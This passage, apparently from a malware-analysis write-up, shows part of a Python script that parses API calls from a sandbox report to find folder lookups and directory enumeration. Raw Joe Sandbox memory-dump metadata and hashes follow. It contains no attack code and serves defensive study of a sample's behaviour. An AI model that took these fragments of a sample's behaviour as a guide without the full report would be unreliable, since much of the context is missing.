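        if c["api"].startswith("SHGetFolderPath") and len(c["args"]) >= 2:
            csidl = int(c["args"][1], 16)
            roots.append(CSIDL_NAMES.get(csidl, f"CSIDL_0x{csidl:02X}"))
    return roots


def has_directory_walk(calls):
    """Heuristic: the FindFirstFile / FindNextFile / FindClose trio means a directory enumeration."""
    apis = {strip_aw(c["api"]) for c in calls}
    return {"FindFirstFile", "FindNextFile", "FindClose"} <= apis


if __name__ == "__main__":
    calls = parse_api_lines(REPORT_LINES)
    print(calls_by_function(calls))
    print("roots:", folder_roots(calls), "walk:", has_directory_walk(calls))
```

Run against the lines above, the grouping shows the entry function doing only string concatenation while 00398DE0 resolves the folder and 00394910 performs the enumeration; the same parser can be pointed at any other function entry in the report by pasting its APIs list into REPORT_LINES.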
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                          • String ID:
                          • API String ID: 2667927680-0
                          • Opcode ID: 551205a64b56b7b9297c4544a59af961fccf46dc4e4a828ef755ed4f37b579c2
                          • Instruction ID: 930e95796e892f7ca87ecfb79f1d3be219c2b881a93a4580ed450fc2723dcc5f
                          • Opcode Fuzzy Hash: 551205a64b56b7b9297c4544a59af961fccf46dc4e4a828ef755ed4f37b579c2
                          • Instruction Fuzzy Hash: C421DA7690020C6BCB55FBB0EC46EEE373CAB65304F004584B64996181EE749ACDCB92